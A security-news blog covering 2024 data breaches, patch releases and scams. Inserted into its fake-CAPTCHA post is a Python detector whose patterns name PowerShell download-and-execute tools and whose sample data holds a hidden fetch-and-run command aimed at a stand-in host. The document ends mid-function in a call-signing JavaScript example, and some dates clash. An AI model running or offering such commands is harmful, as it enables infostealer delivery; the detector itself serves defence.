Wednesday, December 11, 2024

Microsoft Windows Patch Tuesday December 2024

Microsoft Windows Patch Tuesday for December releases patches/fixes for 71 vulnerabilities.

Of the 71 vulnerabilities fixed, one is being actively exploited and another has a CVSS score of 9.8!

It is very highly recommended to apply both the December and November patch sets for Windows 11 and Windows 10.

Apple released iOS 18.2 and iPadOS 18.2 today December 11, 2024

The iOS 18.2 and iPadOS 18.2 update contains 21 security-related updates!

iOS 17.7.3 to address 14 security flaws

iPadOS 17.7.3, macOS Sequoia 15.2, macOS Sonoma 14.7.2, macOS Ventura 13.7.2, watchOS 11.2, tvOS 18.2, visionOS 2.2




iOS 18.2 feature list

iOS 18.2 brings several exciting new features and enhancements to your iPhone. Here are some of the highlights:

  1. Apple Intelligence Enhancements: This update includes major improvements to Apple Intelligence, such as ChatGPT integration with Siri, allowing for more natural and conversational interactions.

  2. Genmoji: Create custom emojis directly from your keyboard. You can describe the emoji you're looking for, and iOS will generate a new emoji based on your description.

  3. Image Playground: Generate fun and playful images based on text prompts, concepts, and people from your photo library.

  4. Visual Intelligence: Available on iPhone 16 models, this feature uses AI to analyze and understand what's around you through the camera.

  5. Mail App Redesign: The Mail app has been redesigned for improved usability, allowing you to sort emails into multiple categories.

  6. Find My Improvements: New options in the Find My app make it easier to locate lost items and share their location with others.

  7. Volume Slider on Lock Screen: You can now add the volume slider back to your lock screen for easier volume control.

Tuesday, November 19, 2024

Apple Updates November 19, 2024

Major updates to Apple product software today, November 19, 2024.

iOS 18.1.1, iPadOS 18.1.1, Sequoia 15.1.1 and others


UPDATE: Apple fixes/updates released today (November 19) address at least 2 vulnerabilities currently being exploited in the wild.
It is highly recommended to apply updates to any and all Apple devices for which updates are available. Initial reports that only Intel-based Macs were affected are thought to be untrue.

Details are scarce, implying the threat is high.

Saturday, November 16, 2024

Six US Banks report potential security breaches of debit cards November 15, 2025

The US banks reporting security breaches of debit cards:
Mainstreet Bank, Savers Bank, The Village Bank, Watertown Savings Bank, Webster Five Cents Savings Bank and Eagle Bank say some debit cards may have been compromised following a security breach at a merchant's payment card platform.

Breach notification

Says Savers Bank,

“We have been notified by MasterCard International of a suspected security breach of a merchant’s network, transactions that may have compromised some of Savers Bank’s debit card numbers.”

Affected customers at Eagle Bank and Savers Bank will receive new cards automatically.

Webster Five Cents Savings Bank offers fewer details on the source of the breach, but says it’s also issuing mandatory new debit cards.

Watertown Savings Bank is asking customers to be vigilant, issuing new cards upon request.

“The breach included the capture of some of your personal information, such as your name and card number…

…we do ask that you remain vigilant on monitoring your account activity for the next 12 to 24 months and report any unusual or suspicious activity immediately. If you prefer that we issue a new card please contact the bank.”

Mainstreet Bank says the breach occurred “June 28, 2023 through April 26, 2024” and involved personally identifiable or protected data.

Tuesday, October 29, 2024

Yet another Insurance service provider breached - Liberty Bankers Insurance Group.

 Serving American Monumental Life Insurance Company, Pellerin Life Insurance Company, American Benefit Life Insurance Company, Liberty Bankers Life Insurance Company, Continental Mutual Insurance Company, and Capitol Life Insurance Company.

Data compromised: names, addresses, dates of birth, social security numbers/tax identification numbers, driver’s license numbers/government-issued ID numbers, financial information such as credit card numbers, and medical and health insurance information.

Persons affected: individuals who at one time were a producer, policy-owner, insured, beneficiary, or payor for insurance policies which Landmark administered, or continues to administer, for Liberty Bankers Insurance Group.

Filings with the Texas and Maine attorneys general indicate 68,000 Texans affected.

With this information, scammers can cite personal details that lead victims to trust them.

Friday, October 11, 2024

Mozilla Firefox Browser Emergency Update

Mozilla has issued an emergency update for the Firefox browser to address a zero-day vulnerability.
Firefox version 131.0.2 has this security update.
The vulnerability is in Animation timelines and has a CVSS score of 9.8.


 Mozilla has applied this emergency fix to the Extended Support Release editions of Firefox and the Tor browser.
Firefox ESR 115.16.1, Firefox ESR 128.3.1 and Tor 13.5.7

Thursday, October 10, 2024

Apple stops signing iOS 18.0 - to stop users from downgrading from iOS 18.0.1

 The iOS upgrade from 18.0 to 18.0.1 has significant security issues and usability problems 

Fidelity Investments reporting data breach 77,000 customers affected

Fidelity Investments is reporting a data breach affecting 77,000 customers. The attack/breach occurred between August 17 and 19.

According to a Fidelity spokesperson, customer information was involved, not accounts. Could the stolen customer information be used to access their accounts?

 Consider taking the normal safeguards and increasing vigilance.

Archive.org hacked: 31 million users

Archive.org is the Internet's archive machine.
Archive.org's user authentication database, containing 31 million unique records, has been hacked and added to the Have I Been Pwned database.

The Archive.org site has been intermittently online and offline recently, possibly due to a DDoS attack.

The data stolen contains: email addresses, screen names, password change timestamps, hashed passwords, and other data.

The data indicates it was stolen on September 28, 2024.

Friday, October 4, 2024

Apple Updates iOS 18.0.1 and iPadOS 18.0.1

 Some minor fixes, BUT 2 security updates.

First, Apple says that iOS 18.0.1 fixes a bug where audio messages in the Messages app could have recorded “a few seconds of audio” before the orange microphone indicator was active in the Dynamic Island and Control Center. This bug only specifically impacted the iPhone 16, iPhone 16 Plus, iPhone 16 Pro, and iPhone 16 Pro Max.

Second, Apple says that iOS 18.0.1 and iPadOS 18.0.1 address a security issue where the VoiceOver feature could have read a user’s saved passwords aloud.

Also with security fixes:
watchOS 11.0.1
visionOS 2.0.1
macOS 15.0.1



iOS 18.0.1 and iPadOS 18.0.1 released 10-4-2024

Reportedly fixes some security issues and the following bugs: an unresponsive touch screen, a camera that may freeze when recording macro mode video in 4K with HDR turned off, Messages unexpectedly quitting, and performance that may be impacted by an issue with memory allocations on some iPhone models.
Security issues fixed: microphone access on iPhone 16, and Passwords app access in all supported iPhone models.
The VoiceOver feature could have read a user's password aloud.

Monday, September 30, 2024

Problem with Outlook.com and Hotmail.com

 From the Computer Club's Help Center:


If you are using an email client (e.g., iPhone/iPad mail app, Microsoft Outlook, Thunderbird) and are unable to send/receive Outlook.com or Hotmail.com emails – surprise! – Microsoft has upgraded security for these email addresses and you must take the actions provided here:   

 

https://support.microsoft.com/en-us/office/modern-authentication-methods-now-needed-to-continue-syncing-outlook-email-in-non-microsoft-email-apps-c5d65390-9676-4763-b41f-d7986499a90d

 

If you are using eM Client, be sure to use the most recent version.  You may have to delete and re-enter your Outlook/Hotmail account.   

 

Make an appointment with the Help Center if you are unable to access your mail.

Wednesday, September 25, 2024

MC2 Data Exposed 24-September 2024

    PrivateRecords.net

   PrivateReports

   People Searcher

   ThePeopleSearchers

   PeopleSearchUSA

MC2 Data database: 2.2TB of people’s data, passwordless, on the Internet. 2.39,873 people.

Data exposed: names, email addresses, IP addresses, user agents, encrypted passwords, partial payment information, home addresses, DoB, phone numbers, property records, legal records, data on family, relatives and neighbors, employment history.

No Social Security numbers.


Saturday, September 21, 2024

NEW and EFFECTIVE malware attack via fake CAPTCHAs

CAPTCHAs are those popups: "I am a Human" or "I am not a robot."
Attackers are now deploying fake CAPTCHAs to get victims to click.
We have done it before, many times. Kinda automatic now. We just want that game at a reduced price or an app we can't afford through vendors' stores.

This CAPTCHA copies a script, then tricks the victim into copying and pasting this malicious script into a PowerShell window and executing it.


The success of this malware campaign shows some have relaxed their awareness.

The result of a successful execution of this malware load:
an infostealer that copies your passwords, password manager vault, and cryptocurrency wallets.
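
One way to spot this paste-and-run pattern after the fact, as an added example that is not part of the original post: the Python sketch below scores PowerShell command lines, such as those PSReadLine keeps in its ConsoleHost_history.txt file, against a few heuristic indicators. The indicator list, the function names and the sample lines are assumptions constructed for illustration.

```python
"""Flag paste-and-run PowerShell one-liners of the kind a fake CAPTCHA delivers."""
import base64
import re

# Heuristic indicators. These are assumptions chosen for this example,
# not a list taken from the original post.
INDICATORS = {
    # Fetching content from the network.
    "download": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget|"
        r"downloadstring|downloadfile|start-bitstransfer)\b", re.I),
    # Running text as code.
    "execute": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    # Asking PowerShell to hide its window (-w hidden, -WindowStyle Hidden).
    "hidden_window": re.compile(r"(?<!\S)-w[a-z]*\s+(hid[a-z]*|h|1)\b", re.I),
    # A trailing comment that makes the pasted text look like a CAPTCHA step.
    "captcha_lure": re.compile(r"#.*(not a robot|captcha|human|verif)", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"(?<!\S)-(?:ec?|en[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(line):
    """Return the UTF-16LE text carried by an encoded-command argument, or None."""
    match = ENCODED_ARG.search(line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers bad base64 and bad UTF-16
        return None


def assess(line):
    """Return (verdict, sorted reasons) for one PowerShell command line."""
    reasons = set()
    text = line
    if ENCODED_ARG.search(line):
        reasons.add("encoded")
        decoded = decode_encoded_command(line)
        if decoded:
            text = line + "\n" + decoded  # scan the hidden payload too
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            reasons.add(name)
    # Download plus execute in one command is the classic "fetch and run".
    fetch_and_run = {"download", "execute"} <= reasons
    # A CAPTCHA-style comment next to any other indicator is not normal admin use.
    lure_plus = "captcha_lure" in reasons and len(reasons) > 1
    if fetch_and_run or lure_plus:
        verdict = "block"
    elif reasons:
        verdict = "review"
    else:
        verdict = "ok"
    return verdict, sorted(reasons)


def scan_history(lines):
    """Return (line number, verdict, reasons) for every line that is not ok."""
    findings = []
    for number, line in enumerate(lines, start=1):
        verdict, reasons = assess(line)
        if verdict != "ok":
            findings.append((number, verdict, reasons))
    return findings


def encode_sample(command):
    """Build the base64/UTF-16LE form of a command (used for test data only)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample history; example.invalid is a reserved, non-resolving name.
SAMPLE_HISTORY = [
    "Get-ChildItem -Path Documents",
    'powershell -w hidden -c "iex (iwr https://example.invalid/verify.txt)" '
    "# I am not a robot - reCAPTCHA ID 0000",
    "Invoke-WebRequest https://example.invalid/setup.msi -OutFile setup.msi",
    "powershell -enc " + encode_sample("Write-Output 'hi'"),
    "powershell -e " + encode_sample("iex (irm https://example.invalid/x)"),
]

if __name__ == "__main__":
    for number, verdict, reasons in scan_history(SAMPLE_HISTORY):
        print(f"line {number}: {verdict} ({', '.join(reasons)})")
```

A "review" verdict is a prompt to look at the line, not proof of compromise; plain downloads and encoded commands also occur in legitimate administration.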

Friday, September 20, 2024

Arc browser security flaw

According to a statement from The Browser Company, the Arc browser has a serious security flaw. Ensure your instance of the Arc browser has the August 26th update.

Wednesday, September 11, 2024

Yet another data breach: Slim CD

  Slim CD is one of the credit card clearing houses that process credit card transactions for businesses. 

Credit card processing takes special know-how, techniques, insurance, trained staff, multiple redundant sites and hardware. So, businesses outsource that portion of their business.

 The attackers had access for over a year, but the data was stolen between June 14 and 15 of this year.

 Full names, physical addresses, email addresses, credit card numbers, expiration dates. The CVV numbers were not reported stolen.

Slim CD has yet to offer IDentity theft protection or credit monitoring services.

 The breach notification: Slim CD Notification

Tuesday, September 10, 2024

More Information on Credit freeze at credit reporting bureaus besides the top 4.

 https://cyberhoot.com/cybrary/identity-theft/


A little sales pitch, BUT valuable information.
Cyber criminals will use Innovis to open new accounts since all media cites the top 3.

Medicare/Medicaid beneficiaries data breach 10-September-2024

 Cyber incident in May of 2023 may have exposed personal information related to Medicare/Medicaid beneficiaries using Wisconsin Physicians Services Insurance Corporation.

Names, date of birth, SSN, mailing addresses, Medicare Beneficiary Identifiers, and related medical information were stolen as part of the ever evolving MOVEit issue.

 Those affected should be notified soon and be issued a new CMS card and notice of the breach.

Friday, August 23, 2024

Google Urges Chrome Update August 22, 2024

  Version 128.0.6613.84/.85

Exploit in the wild. Chromium browsers should also issue updates very soon.

Wednesday, August 21, 2024

Toyota confirms data breach August 21, 2024

 Very few details. Toyota confirms the data breach. Investigation ongoing.

 Attackers claim: "Contents: Everything like Contacts, Finance, Customers, Schemes, Employees, Photos, DBs, Network infrastructure, Emails, and a lot of perfect data. We also offer you AD-Recon for all the target network with passwords."

 Toyota:

"We are aware of the situation. The issue is limited in scope and is not a system wide issue,"
"engaged with those who are impacted and will provide assistance if needed."


Thursday, August 15, 2024

National Public Data breach - Was my data exposed?

Billions of personal information records have been published on the dark web and other venues. The data, from non-public sources, contains full names, names of relatives, full social security numbers, dates of birth, physical addresses, etc.

 You might wonder if your data or the data of a relative is one of those billions of records.

 Some sites and companies are offering a tool to check.

 BUT to check you have to provide the very data to those sites that you wish to check/search.

Consider that your data is one or more of those billions of stolen records and that those records are for sale or have been made available.


https://npd.pentester.com/


Yesterday this search site was a little dodgy.
A little better today.
A caution, you are supplying the data to search for.
In my testing I found some errors
BUT the amount of data and most results were accurate.

If your information is not in a search result
PLEASE DO NOT assume you are safe.
We ALL need to be more vigilant, cautious, suspicious.

Friday, August 9, 2024

1Password users on Mac urged to apply patch

Mac users of 1Password version 8.10.36 are urged to apply a patch to prevent attackers from stealing entire password vaults.

“To exploit the issue, an attacker must run malicious software on a computer specifically targeting 1Password for Mac. An attacker is able to misuse missing macOS-specific inter-process validations to hijack or impersonate a trusted 1Password integration such as the 1Password browser extension or CLI.”

“This would permit the malicious software to exfiltrate vault items, as well as obtain derived values used to sign in to 1Password, specifically the account unlock key and “SRP-𝑥”.”

 Advisory

Thursday, August 8, 2024

Many Central Texas 911 systems were hacked August 4, 2024

Some Central Texas 9-1-1 call centers faced serious difficulties on Sunday (August 4) when callers and call-takers had difficulty hearing each other.

Austin and Lakeway were communicating via social media.

The Capital Area Council of Governments, which operates the 9-1-1 systems, announced later that the problem was due to a cyber attack called a denial of service.

Wednesday, August 7, 2024

Apple Releases Updates iOS 17.6.1, iPadOS 17.6.1, August 7, 2024

  Apple releases updates to several platforms this evening.

iOS 17.6.1, iOS 16.7.10, iPadOS 17.6.1, iPadOS 16.7.10, macOS Sonoma 14.6.1


Older devices may also receive this important update from Apple.

Apple statement: “This update includes important bug fixes and addresses an issue that prevents enabling or disabling Advanced Data Protection.”

However, Apple just updated iOS to 17.6 last week, and Apple rarely gives details on updates with a security element.

It worries me that iOS 16.7.10 also has an update.

Tuesday, August 6, 2024

National Public Data information on 2.9 billion persons available on Dark Web 6-Aug-2024

  National Public Data is a background check service. The service scrapes non-public sources to carry out background checks on billions of people.

 Data collected includes SSN, full names, addresses, relatives, ...
This data was not given to National Public Data willingly or with consent/notice. Most victims will be unaware the data was collected, stored, or used at all.

 The data stolen is being offered for sale: $3.5M.

 A class action suit claims:
 Negligence, breach of fiduciary duty and third-party beneficiary contract, and unjust enrichment.

 Yet another reason to greatly increase awareness, vigilance, and communications to any and all.

Wednesday, July 31, 2024

Health Equity reports data breach 30-July-2024

HealthEquity, a non-bank health savings trustee responsible for administering HSA accounts, is reporting a massive data breach that occurred in March 2024.

Personal information that may have been accessed includes, but is not limited to:
names, employee IDs, employers, addresses, phone numbers, social security numbers, dependent contact information.

 4.3 million persons may be affected. Breach reported beginning of July. HealthEquity services HSA, FSA, HRA and 401K.

 Affected persons should be notified beginning in August.

 As with any data breach, increase vigilance, act quickly, REPORT.

Monday, July 29, 2024

Apple Updates July 29, 2024

  Updates available for iOS 17.6, iPadOS 17.6, and Sonoma 14.6

iOS 15.8.3, iOS 16.7.9, iPadOS 16.7.9, Monterey 12.7.6, Ventura 13.6.8, watchOS 10.6, tvOS 17.6, visionOS 1.3

Only reported new features: News+ for home and lock screen.
 Messages app ability to filter unknown senders if they are international numbers.

And bug fixes and security updates.

The US Cybersecurity and Infrastructure Security Agency (CISA) is urging people to update their Apple devices immediately.

Apple Private Relay outage resolved July 29, 2024

  Apple reports the problem with Private Relay for Safari on iDevices has been resolved.

The outage was reported July 26 and lasted for 56 hours; service was restored at 10:59pm Eastern July 28.

 iCloud Private Relay hides your Internet IP address for privacy and security.

Saturday, July 27, 2024

Evolve Bank & Trust and associated financial firms data breach - Customer data now available on the Dark Web

The July 4, 2024 Cyber Security presentation recording mentioned the data breach at Evolve Bank and Trust. At the time of the report a sample set of the customer data appeared to be genuine. Ransom negotiations were known to be ongoing.

A recent posting on the dark web indicates a very large number of those customer records are available for sale.

Several firms that have worked with Evolve Bank & Trust may have had their customers' data stolen and made available for sale on the Dark Web as well. Affirm, Affirm Card, Wise, Bilt, Marqeta, Mercury, and EarnIn are a few examples. The data set reportedly covers 7,640,112 customers and includes, but is not limited to: name, SSN, bank account numbers, phone numbers, email addresses, ...

 Please use extra caution, inform friends, family, neighbors.

Friday, July 19, 2024

Global Outage 19-July-2024 Due to security vendor's update

  Large global outages due to a software security update.
Yes, it is not only you. This can and did happen on a global scale.
The outage started 19:00 GMT July 18, 2024.

Major sites/businesses are down for a period of time until the affected machines can be physically visited, the root cause removed, and the machines rebooted.

So, this will take some time to resolve.

A CrowdStrike update appears to be the root cause.

 Major industry sectors are experiencing outages.

 From hospital rumor: It might get worse. Take cash





Wednesday, July 17, 2024

Changes to Social Security Account Login requirements

The federal government is planning to change how people will log in to access their social security accounts.

 Current access via email/username and password will change to require a Login.gov or ID.me account. 

 The process is easy. If you have an existing Login.gov or ID.me account you can link your social security account. 

 If you do not, use your existing my SSN account and follow the detailed instructions to create either a Login.gov or ID.me account.
Then link your social security account. 

 More information:

https://blog.ssa.gov/changes-are-coming-to-how-you-access-social-securitys-online-services/

Friday, July 12, 2024

UPDATE MASSIVE AT&T customers call & text records data breach

 July 12   CNN Report

AT&T said the compromised data includes the telephone numbers of “nearly all” of its cellular customers and the customers of wireless providers that use its network between May 1, 2022 and October 31, 2022.

The data was the metadata: Phone numbers called, call duration, number of times called/messaged. But cell tower site identification records may have been released.

 The FCC is investigating according to their social media posts on X (formerly Twitter).

This data breach is not related to the March 2024 incident (73 million customers' PII on the dark web).

The Department of Justice delayed public disclosure due to national security and public safety concerns.

An advisory/notice from AT&T:

https://www.att.com/support/article/my-account/000102979


I requested my information, got the response that day. Very little detail. 

News services are reporting the hacker was paid about $300,000 to erase the data stolen.

The data was stolen from an unsecured cloud server. The stolen data was stored on a cloud server. Cloud servers do backups and replication. Consider the data still available. I easily requested my data. Anyone can request your data with a little effort. Use multi-factor authentication protections on accounts.

Thursday, July 11, 2024

Apple issues new spyware attack warning to iPhone users

  Some users in 98 countries may receive warnings on their iPhones of a potential for spyware loaded on their devices. 

This is the second such warning. Little is known of the need for this warning.

 “Apple detected that you are being targeted by a mercenary spyware attack that is trying to remotely compromise the iPhone associated with your Apple ID -xxx-,” 

A zero-click attack allowing the attacker(s) complete control of the device including reading encrypted messages and data.

 If you are a high profile user or rely on encryption protections, consider Lockdown mode.

 Turning your iPhone off nightly might be helpful.

 Applying updates is now so important.

Critical vulnerability in Outlook

Outlook is Microsoft's email system: server, client, application. It is part of several Microsoft subscriptions.

 The vulnerability, tracked as CVE-2024-38021, allows an attacker to take control of the system it is running on, no user interaction, no authentication, full control, no click, remote code execution. 

 The vulnerability along with 142 others was patched with the July 9 Microsoft Patch Tuesday monthly security patch release. Thus very important to apply security updates. Recall June had a fix for the very critical Microsoft Windows wireless driver stack.

You may have other email systems/clients, BUT Outlook may be started as part of Windows startup.

Wednesday, July 10, 2024

Apple and others released Cyber Security Guidance

A LARGE increase in attacks against iPhone and other devices recently (July 6 and since) has prompted Apple to release guidance to protect against this increase. Other technology and security companies are also warning customers and consumers.

With this LARGE increase of cyber activity you will receive warnings to change your password, move your money, and other common scams. LARGE increase. BE MORE AWARE. Some of those warnings are from the scammers/criminals.

The Computer Club's Special Interest Groups, Announcements, Wiki, and emails provide information to help residents be cyber safer. The Cyber Security SIG, Scams and Computer Safety, Internet of Things, MUG, Windows and other presentations are recorded and available.

 Please use these and other resources. The NRO Anti-Fraud Group.
Not one more resident a victim of cyber crime!

 https://support.apple.com/en-us/102568

Friday, July 5, 2024

Critical July Android Security Patch

Google issues Android patches on a monthly basis. For July one patch for CVE-2024-31320 is rated critical by Google.

Android updates are issued to all manufacturers who use Android for their devices. Smartphones, smart tablets, TVs, streamers, etc.
Those manufacturers then integrate the updates into their products, apply vendor-specific updates, test, then release the update to their customers. Google Pixel and Samsung are quick to release.

Exploitation of this vulnerability could allow an attacker to take complete control of an Android device.

 Android 12 and 12L are most impacted, but the July Android update fixes 25 issues across the varied Android versions.

 On Android: Settings > System or Software Update
Check for Updates
Follow instructions for the update
If not available, check again soon

For more information:

Android Security Bulletin July 2024

Thursday, July 4, 2024

regreSSHion vulnerability.

Discovered this week (July 1): an unauthenticated remote code execution flaw that grants an exploiter full root access with the ability to create a root-level shell. It affects the default configuration and requires no user interaction.
This discovery will RAPIDLY be weaponized.
A bit of good news: this is a race condition flaw, so it is not as easy to exploit.
 This is breaking news. More information to follow.

Friday, June 21, 2024

CDK Global issues URGENT Warning

  CDK Global is a software platform used by car dealerships. 
As mentioned in the last Cyber Security SIG presentation, CDK Global suffered a cyber attack June 18. Then another the next day.
CDK Global is urging customers of auto dealerships from GM, Nissan, and some BMW to not respond to requests for personal information or credit card numbers from attackers posing as CDK Global.

Wednesday, June 19, 2024

VERY IMPORTANT Windows Update for Wireless vulnerability

  This vulnerability for the wireless protocol stack affects ALL versions of Microsoft Windows.

 The vulnerability allows an attacker in close proximity to take over an unpatched Windows system. Any Windows version.

 This vulnerability was patched with the June 11 Patch Tuesday update.

 PLEASE use the updates for any and everything!!

Saturday, June 8, 2024

Snowflake Attack "Largest Data Breach Ever?"

 The number of claimed victim companies of the Snowflake cloud provider data breach grows larger daily.

 Confirmed victims (so far):
Ticketmaster
Santander

Reported victims:
Advanced Auto Parts
LendingTree & QuoteWizard

Alleged victims:
Allstate
Anheuser-Busch
Mitsubishi
Neiman Marcus
Progressive
State Farm

IDentity fraud is a more accurate description of the risks? IDentity theft - your identity is still there. IDentity fraud - others have access to your identity as well.

This item was covered in the Cyber Security SIG presentation June 6.

The NRO Anti-Fraud group, the Computer Club are attempting to make "Not one more Sun City resident" a realistic goal.


Friday, May 24, 2024

Yet Another URGENT Google Chrome Update

 The new version numbers are 125.0.6422.112/.113 for Windows and Mac, and 125.0.6422.112 for Linux.

 It is good advice to check browsers for updates daily or before any financial site transactions.


Tuesday, May 21, 2024

Monday, May 20, 2024

Apple releases updates May 20, 2024

  Apple released updates today for iOS and iPadOS 17.5.1 to fix the deleted photos issue.

This update provides important bug fixes and addresses a rare issue where photos that experienced database corruption could reappear in the Photos library even if they were deleted.

Monday, May 13, 2024

Apple Updates May 13, 2024

Apple is releasing many updates today: 13-May-2024.

Updates to iOS 17.5, iPadOS 17.5, iPadOS 16.7.8, macOS 14.5.
Safari 17.5, iOS 16.7.8, macOS Ventura 13.6.7, macOS Monterey 12.7.5, watchOS 10.6, tvOS 17.5

 New features and security updates.

Friday, May 10, 2024

Google releases new version of Chrome Browser due to vulnerabilities

  Google releases updates to its Chrome browser to address several vulnerabilities.

 "Google is aware that an exploit for CVE-2024-4671 exists in the wild,"

 Users are recommended to upgrade to Chrome version 124.0.6367.201/.202 for Windows and macOS, and version 124.0.6367.201 for Linux to mitigate potential threats.

 Browsers based on the Chromium engine will probably release their updates soon.

 It is good practice to check for browser updates before use on any financial transactions.

Thursday, May 9, 2024

Dell investigating data breach

 



Possible customer information accessed:
Name, Physical address, Dell hardware information

Tuesday, April 23, 2024

United Health Data Leak Confirmed

 The ransomware gang claiming responsibility for the UnitedHealth Group data leak has confirmed the data for sale on the Dark Web is indeed their data on their patients.

UnitedHealth Group's Change Healthcare is slowly gaining ground on backlogged payments to health providers.

 "A ransom was paid as part of the company’s commitment to do all it could to protect patient data from disclosure" - UnitedHealth Group

The ransomware group, BlackCat/ALPHV, pulled an exit move and left with the ransom. The claim of 6TB of patient and provider data has appeared and disappeared from the Dark Web site selling portions of that data.

UnitedHealth Group is preparing to offer two years of credit monitoring and identity theft protection to affected parties after the investigation.

“Based on initial targeted data sampling to date, the company has found files containing protected health information (PHI) or personally identifiable information (PII), which could cover a substantial proportion of people in America,”

Wednesday, April 17, 2024

Omni Hotels and Resorts Data Breach Recent Update

 More information here.

An advantage of data protection services: earlier warnings of data breaches.

Friday, April 12, 2024

Roku Cyber Attack

Roku announced that 500,000 accounts were impacted by a cyber attack discovered while investigating a data breach affecting 15,000 Roku accounts.

This second attack, a result of "credential stuffing," allowed attackers to make unauthorized purchases of hardware products and service subscriptions. Roku will reverse charges or refund the affected accounts.

 Roku has enabled two-factor authentication for all Roku accounts.

AT&T Data Breach Update

 


All 70+ million current and past AT&T customers who are known to have their data for sale may soon get the above email. If you still have the same email you gave AT&T.

The subscription code is for Experian IdentityWorks service. 
We have covered Experian's privacy issues in past Cyber Security SIG recorded presentations.

AT&T had issues with the large amount of emails. Experian had issues with the large number of requests.

Wednesday, April 10, 2024

MalwareBytes Digital Footprint Scan

 MalwareBytes has a Digital Footprint Scan:

https://www.malwarebytes.com/digital-footprint

This is a result you hope for:



In my testing the passwords/passphrases returned are accurate.

AND have i been pwned?

Monday, April 8, 2024

Google for Privacy?

 Google is not known for their privacy.
Their revenue stream comes from collecting data about us.
We know that!

BUT
Did you know you can use that collected data to your benefit also?

You can login to your Google account(s) and
1) Create an alert with search terms.


2) Using Google One you can search the dark web for:

Social Security Number (requires verification)
Name(s)
Physical Addresses
Phone Numbers
Email Addresses
And get results
(very disturbing results)


NOTE: The Password results. These are the in-the-clear passwords available on the Dark Web that we keep hearing about.
(More like grey web BUT ...)

Invest some time now. Let family, friends, neighbors, and members know.

Monday, March 25, 2024

Apple releasing security fixes today 25-Mar-2024

  Security updates for macOS 14.4.1, macOS Ventura 13.6.6, iOS 16.7.7, and visionOS 1.1.1 join the security patches to iOS 17.4.1 and iPadOS 17.4.1 released 21-Mar-2024.

 These security updates fix vulnerabilities that could lead to arbitrary code execution. Thus important.

Thursday, March 21, 2024

Apple Security related Updates today 21-Mar-2024 iOS & iPadOS

 Updates to current iOS and iPadOS releases: 17.4.1

Updates to older releases iOS 15.8.2   iPadOS 16.7.2

This indicates to me these are security related.

Tuesday, March 5, 2024

iOS iPadOS Emergency Updates

Apple has stated that the iOS 17.4 updates were due in order to comply with the EU DMA regulations. Those updates were released today, March 5, 2024, a few days prior to the deadline.

 However, the 17.4 iOS and iPadOS updates also addressed 2 major security flaws. Updates to iPadOS 16.7.6 and Safari 17.3.1 available now.

 Consider these updates as urgent.

Facebook, Instagram, Threads are currently down

Meta is aware BUT no updates

Sunday, February 18, 2024

Bank of America Data Breach 17-Feb-2024

 Data breach notification filed in Maine. Persons affected used Bank of America's deferred compensation plans. 

The breach occurred at Infosys McCamish Systems.

“It is unlikely that we will be able to determine with certainty what personal information was accessed as a result of this incident at IMS.

According to our records, deferred compensation plan information may have included your first and last name, address, business email address, date of birth, Social Security number, and other account information.”

Friday, February 16, 2024

Williamson County reporting data breach.

 WILLIAMSON COUNTY, Texas — Central Texas residents are being warned about a data breach that happened in 2022.

Officials said they discovered during an investigation that an unauthorized user gained access to an email account with a member of the 277th District Court in Williamson County, who then may have seen or taken certain information.

According to officials, certain people who interacted with the court on or before Nov. 10, 2022, may have their personal information impacted.

Sensitive information impacted varies by person but county officials said it could include names, addresses, Social Security numbers, and more. Officials also said they conducted a review of the attack and plan to reach out to those who may have been affected.

Cybersecurity experts said these types of attacks are not only happening more often but that government entities like Williamson County are also increasingly becoming the target of such attacks.

"Especially for the data that they have, we see that for multiple reasons," Mitchem Boles said. "But any type of data that's taken, according to Verizon's data breach investigation report from last year, 97% of those malicious actors are motivated by financial gain."

Boles also said these types of attacks can be accessed through emails easily when it comes to scam links and phishing fraud across the internet. He also says government agencies are seemingly being attacked more frequently.

"Because of older infrastructure. They're underfunded. They don't necessarily have the protections in place for their data, for their emails and for their users," said Boles. "We know that these kinds of attacks will only increase really in number and sophistication into 2024. So we don't see it slowing down."

KVUE reached out to Williamson County officials for more information, but we were told that no interviews would be conducted at this time.

What to do if you think you were affected

If you think your identity has been stolen, you can place a credit freeze to stop anyone from creating a new credit account in your name.

The freeze can be placed by contacting any of the three major credit reporting agencies: Equifax, Experian or TransUnion. The request can be submitted online, by phone, or by mail.


UPDATE: reports to the Texas Attorney General's office claim 3,763 persons' personal information was exposed.
November 2022. Just now being informed.


Read the notification here.

Thursday, February 8, 2024

iOS 17.3.1 iPadOS 17.3.1 Sonoma 14.3.1 watchOS 10.3.1 visionOS 10.3.1 Updates released 8-Feb-2024

Updates fix a bug where text may overlap while typing.

And potential security-related issues. The tell: updates to Sonoma, and Safari to 17.3, on older Macs and iPads.

Sunday, February 4, 2024

AT&T adding SPAM Detect Feature

 AT&T is starting to provide TruContact Branded Call Display.

A feature in partnership with TransUnion. The delivery to cell customers uses the STIR/SHAKEN protocol to authenticate callers.
Callers need to register with TransUnion.

The incoming calls should display the company's logo, name, phone number and valid number.

 The STIR/SHAKEN protocol uses asymmetric cryptography to validate the information displayed.

 Only a very few companies are using TruContact Branded Call Display currently. 
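To show what "asymmetric cryptography" means here, the following added example (not code from AT&T, TransUnion, or this blog) signs and verifies a SHAKEN PASSporT token as defined in RFC 8225 and RFC 8588. It assumes a throwaway P-256 key in place of a real STI certificate, fictional 555 numbers, a placeholder `x5u` URL, and a 60-second freshness window.

```javascript
const crypto = require('node:crypto');

const b64u = (data) => Buffer.from(data).toString('base64url');
const fromB64u = (s) => Buffer.from(s, 'base64url').toString('utf8');

// Sign a SHAKEN PASSporT (RFC 8225/8588) as a JWS compact token with ES256.
function signPassport(privateKey, { orig, dest, attest, origid, iat, x5u }) {
  const header = { alg: 'ES256', ppt: 'shaken', typ: 'passport', x5u };
  const payload = { attest, dest: { tn: [dest] }, iat, orig: { tn: orig }, origid };
  const input = `${b64u(JSON.stringify(header))}.${b64u(JSON.stringify(payload))}`;
  // JWS ES256 carries the raw r||s signature (IEEE P1363), not DER.
  const sig = crypto.sign('sha256', Buffer.from(input),
    { key: privateKey, dsaEncoding: 'ieee-p1363' });
  return `${input}.${b64u(sig)}`;
}

// Terminating side: check signature, then numbers against the call, then age.
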